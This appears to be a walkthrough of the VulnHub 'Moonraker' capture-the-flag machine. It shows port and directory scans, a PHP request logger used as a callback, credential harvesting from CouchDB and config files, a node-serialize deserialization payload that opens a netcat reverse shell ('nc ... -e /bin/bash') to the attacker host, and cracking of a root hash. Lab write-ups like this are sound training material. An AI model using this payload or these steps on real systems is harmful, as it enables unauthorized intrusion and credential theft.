you can download it here: https://www.vulnhub.com/entry/moonraker-1,264/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 08:59 EDT
Nmap scan report for 192.168.227.170
Host is up (0.0016s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
| 256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
|_ 256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: MOONRAKER
3000/tcp open http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=401
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ couchdb: 38109
5984/tcp open couchdb?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Object Not Found
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 58
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 13:00:15 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: bbae46e2d3
| X-CouchDB-Body-Time: 0
| {"error":"not_found","reason":"Database does not exist."}
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 164
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 12:59:23 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: 331f9234f8
| X-CouchDB-Body-Time: 0
| {"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}}
| HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Cache-Control: must-revalidate
| Connection: close
| Content-Length: 61
| Content-Type: application/json
| Date: Thu, 13 Jun 2019 12:59:23 GMT
| Server: CouchDB/2.2.0 (Erlang OTP/19)
| X-Couch-Request-ID: 0c2791639a
| X-Couch-Stack-Hash: 1828508689
| X-CouchDB-Body-Time: 0
|_ {"error":"unknown_error","reason":"badarg","ref":1828508689}
38109/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5984-TCP:V=7.70%I=7%D=6/13%Time=5D0248AC%P=i686-pc-linux-gnu%r(GetR
SF:equest,1A3,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:\x20must-revalidate
SF:\r\nConnection:\x20close\r\nContent-Length:\x20164\r\nContent-Type:\x20
SF:application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2012:59:23\x20G
SF:MT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-Req
SF:uest-ID:\x20331f9234f8\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"couchdb\"
SF::\"Welcome\",\"version\":\"2\.2\.0\",\"git_sha\":\"2a16ec4\",\"features
SF:\":\[\"pluggable-storage-engines\",\"scheduler\"\],\"vendor\":{\"name\"
SF::\"The\x20Apache\x20Software\x20Foundation\"}}\n")%r(HTTPOptions,16E,"H
SF:TTP/1\.0\x20500\x20Internal\x20Server\x20Error\r\nCache-Control:\x20mus
SF:t-revalidate\r\nConnection:\x20close\r\nContent-Length:\x2061\r\nConten
SF:t-Type:\x20application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2012
SF::59:23\x20GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\n
SF:X-Couch-Request-ID:\x200c2791639a\r\nX-Couch-Stack-Hash:\x201828508689\
SF:r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":\"unknown_error\",\"reas
SF:on\":\"badarg\",\"ref\":1828508689}\n")%r(FourOhFourRequest,146,"HTTP/1
SF:\.0\x20404\x20Object\x20Not\x20Found\r\nCache-Control:\x20must-revalida
SF:te\r\nConnection:\x20close\r\nContent-Length:\x2058\r\nContent-Type:\x2
SF:0application/json\r\nDate:\x20Thu,\x2013\x20Jun\x202019\x2013:00:15\x20
SF:GMT\r\nServer:\x20CouchDB/2\.2\.0\x20\(Erlang\x20OTP/19\)\r\nX-Couch-Re
SF:quest-ID:\x20bbae46e2d3\r\nX-CouchDB-Body-Time:\x200\r\n\r\n{\"error\":
SF:\"not_found\",\"reason\":\"Database\x20does\x20not\x20exist\.\"}\n");
MAC Address: 00:0C:29:F2:89:C9 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.64 ms 192.168.227.170

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.28 seconds

check its http service(port 80)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@kali:~/cats# dirb http://192.168.227.170/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jun 13 09:02:32 2019
URL_BASE: http://192.168.227.170/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.170/ ----
==> DIRECTORY: http://192.168.227.170/accounting/
==> DIRECTORY: http://192.168.227.170/cats/
+ http://192.168.227.170/index.html (CODE:200|SIZE:422)
+ http://192.168.227.170/robots.txt (CODE:200|SIZE:26)
+ http://192.168.227.170/server-status (CODE:403|SIZE:303)
==> DIRECTORY: http://192.168.227.170/services/

---- Entering directory: http://192.168.227.170/accounting/ ----
+ http://192.168.227.170/accounting/index.php (CODE:200|SIZE:55)

---- Entering directory: http://192.168.227.170/cats/ ----

---- Entering directory: http://192.168.227.170/services/ ----
+ http://192.168.227.170/services/index.html (CODE:200|SIZE:1756)

-----------------
END_TIME: Thu Jun 13 09:02:43 2019
DOWNLOADED: 18448 - FOUND: 5

followed from http://192.168.227.170/services/ and found this:

http://192.168.227.170/svc-inq/sales.html

1

at first I thought it would be an xss, but I launched beef and inserted js code, never got a session back.

wrote a php file to see if I can get any information from the client.

1
2
3
4
5
6
7
8
9
<?php
foreach($_SERVER as $key => $value){
if(strpos($key, "TTP")) {
echo $key." : ".$value."\n";
file_put_contents('logs.txt', $key." : ".$value."\n", FILE_APPEND);
}
}
file_put_contents('logs.txt', "\n\n", FILE_APPEND);
?>

add one line in the enquiry:

1
<img src="http://192.168.227.165/info.phtml"></img>

wait for a while and check logs.txt.

2

ok, got this /svc-inq/salesmoon-gui.php and followed that link lead me here: http://192.168.227.170/raker-sales/index.html

some quick notes:

http://192.168.227.170/raker-sales/hugo.txt

3

apparently this extra and useless line var obj = serialize.unserialize(str);will lead to command execution. but port 3000 is http authentication required. I didn’t know the password yet.

another one useful information:

4

seems that couchdb can be accessed from web, and the password is jaws’ girlfriends name + “x99” w/o quotes

5

so jaws: dollyx99, this would be the password for couchdb, but where is the login page?

got the answer from here: https://stackoverflow.com/questions/24053792/how-to-get-couchdb-username-and-password

:5984/_utils/index.html

6

found some useful information in link database:

7

8

found this: http://192.168.227.170/HR-Confidential/offer-letters.html

and inside are the offer letter with credentials inside:

9

make a compiled list:

1
2
3
4
5
6
7
8
9
10
11
Username: jaws
Password: dollyx99

Username: holly
Password: ArchivesPistolsL2K

Username: hugo
Password: TempleLasersL2K

Username: guard
Password: FacProxsL2K

so now I have the credential for hugo, and I can visit http service at port 3000.

10

according to the code snippet above, the profile cookie will be base64 decoded first and will be brought into serialize.unserialize and lead to rce.

working payload can be found here: https://paper.seebug.org/213/

1
{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('nc 192.168.227.165 12345 -e /bin/bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}

base64 encode it and put it into cookie, get a reverse shell.

11

接下开开始你的表演 XD

walked around and found nothing. except the email under /var/mail/ but I have no privilege to read.

12

try to su to other account with credential found above but all failed.

found some entry in /home/jaws/.bash_history:

13

take a look at /opt/couchdb/etc/local.ini

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
jaws@moonraker:~$ ccaatt  /opt/couchdb/etc/local.ini/opt/couchdb/etc/local.ini

; CouchDB Configuration Settings

; Custom settings should be made in this file. They will override settings
; in default.ini, but unlike changes made to default.ini, this file won't be
; overwritten on server upgrade.

[couchdb]
;max_document_size = 4294967296 ; bytes
;os_process_timeout = 5000

[couch_peruser]
; If enabled, couch_peruser ensures that a private per-user database
; exists for each document in _users. These databases are writable only
; by the corresponding user. Databases are in the following form:
; userdb-{hex encoded username}
;enable = true
; If set to true and a user is deleted, the respective database gets
; deleted as well.
;delete_dbs = true
; Set a default q value for peruser-created databases that is different from
; cluster / q
;q = 1

[chttpd]
;port = 5984
;bind_address = 127.0.0.1
; Options for the MochiWeb HTTP server.
;server_options = [{backlog, 128}, {acceptor_pool_size, 16}]
; For more socket options, consult Erlang's module 'inet' man page.
;socket_options = [{recbuf, 262144}, {sndbuf, 262144}, {nodelay, true}]

[httpd]
; NOTE that this only configures the "backend" node-local port, not the
; "frontend" clustered port. You probably don't want to change anything in
; this section.
; Uncomment next line to trigger basic-auth popup on unauthorized requests.
;WWW-Authenticate = Basic realm="administrator"

; Uncomment next line to set the configuration modification whitelist. Only
; whitelisted values may be changed via the /_config URLs. To allow the admin
; to change this value over HTTP, remember to include {httpd,config_whitelist}
; itself. Excluding it from the list would require editing this file to update
; the whitelist.
;config_whitelist = [{httpd,config_whitelist}, {log,level}, {etc,etc}]

[query_servers]
;nodejs = /usr/local/bin/couchjs-node /path/to/couchdb/share/server/main.js

[couch_httpd_auth]
; If you set this to true, you should also uncomment the WWW-Authenticate line
; above. If you don't configure a WWW-Authenticate header, CouchDB will send
; Basic realm="server" in order to prevent you getting logged out.
; require_valid_user = false

[daemons]
; enable SSL support by uncommenting the following line and supply the PEM's below.
; the default ssl port CouchDB listens on is 6984
; httpsd = {chttpd, start_link, [https]}

[ssl]
;cert_file = /full/path/to/server_cert.pem
;key_file = /full/path/to/server_key.pem
;password = somepassword
; set to true to validate peer certificates
;verify_ssl_certificates = false
; Set to true to fail if the client does not send a certificate. Only used if verify_ssl_certificates is true.
;fail_if_no_peer_cert = false
; Path to file containing PEM encoded CA certificates (trusted
; certificates used for verifying a peer certificate). May be omitted if
; you do not want to verify the peer.
;cacert_file = /full/path/to/cacertf
; The verification fun (optional) if not specified, the default
; verification fun will be used.
;verify_fun = {Module, VerifyFun}
; maximum peer certificate depth
;ssl_certificate_max_depth = 1
;
; Reject renegotiations that do not live up to RFC 5746.
;secure_renegotiate = true
; The cipher suites that should be supported.
; Can be specified in erlang format "{ecdhe_ecdsa,aes_128_cbc,sha256}"
; or in OpenSSL format "ECDHE-ECDSA-AES128-SHA256".
;ciphers = ["ECDHE-ECDSA-AES128-SHA256", "ECDHE-ECDSA-AES128-SHA"]
; The SSL/TLS versions to support
;tls_versions = [tlsv1, 'tlsv1.1', 'tlsv1.2']

; To enable Virtual Hosts in CouchDB, add a vhost = path directive. All requests to
; the Virual Host will be redirected to the path. In the example below all requests
; to http://example.com/ are redirected to /database.
; If you run CouchDB on a specific port, include the port number in the vhost:
; example.com:5984 = /database
[vhosts]
;example.com = /database/

; To create an admin account uncomment the '[admins]' section below and add a
; line in the format 'username = password'. When you next start CouchDB, it
; will change the password to a hash (so that your passwords don't linger
; around in plain-text files). You can add more admin accounts with more
; 'username = password' lines. Don't forget to restart CouchDB after
; changing this.
[admins]
;admin = mysecretpassword
;
;REMOVING Hugo's Admin access until front end is complete, uncomment to change -Jaws
;hugo = 321Blast0ff!!

another set of credential: hugo: 321Blast0ff!!

tried to su to hugo and succeeded.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
hugo@moonraker:/var/mail$ ccaatt  //vvaarr//mmaaiill//hhuuggoo

From moonrakertech@moonraker.localdomain Fri Oct 5 19:11:17 2018
Return-Path: <moonrakertech@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1003)
id 81CA720405; Fri, 5 Oct 2018 19:11:17 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: RE:Root Access
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181005231117.81CA720405@moonraker.localdomain>
Date: Fri, 5 Oct 2018 19:11:17 -0400 (EDT)
From: moonrakertech@moonraker.localdomain

Mr. Hugo Drax, I don't care if you're the president of the United States, You will need to create a ticket for this request. Do you not understand the IT request process or do we need to require more mandatory online training?

From moonrakertech@moonraker.localdomain Fri Oct 5 19:39:51 2018
Return-Path: <moonrakertech@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1003)
id DEF0A20410; Fri, 5 Oct 2018 19:39:51 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: RE:RE:RE:Root Access
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181005233951.DEF0A20410@moonraker.localdomain>
Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT)
From: moonrakertech@moonraker.localdomain

Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.

Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes.

Have fun with the decryption process "Boss"! Haha!

root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

From hr@moonraker.localdomain Fri Oct 5 20:24:20 2018
Return-Path: <hr@moonraker.localdomain>
X-Original-To: hugo@moonraker.localdomain
Delivered-To: hugo@moonraker.localdomain
Received: by moonraker.localdomain (Postfix, from userid 1000)
id 2412120452; Fri, 5 Oct 2018 20:24:20 -0400 (EDT)
To: hugo@moonraker.localdomain
Subject: Decompression Accident
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20181006002420.2412120452@moonraker.localdomain>
Date: Fri, 5 Oct 2018 20:24:20 -0400 (EDT)
From: hr@moonraker.localdomain

Mr. Hugo, since you were a witness to Moonrakertech's accident, you'll have to write up a statement. Just stick to the basics like we talked about. Jaws deleted the camera footage, and there were no witnesses.

ok, now I have the old hash of root.

1
root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

decrypt using john.

14

using cyberVR00M to login to root.

15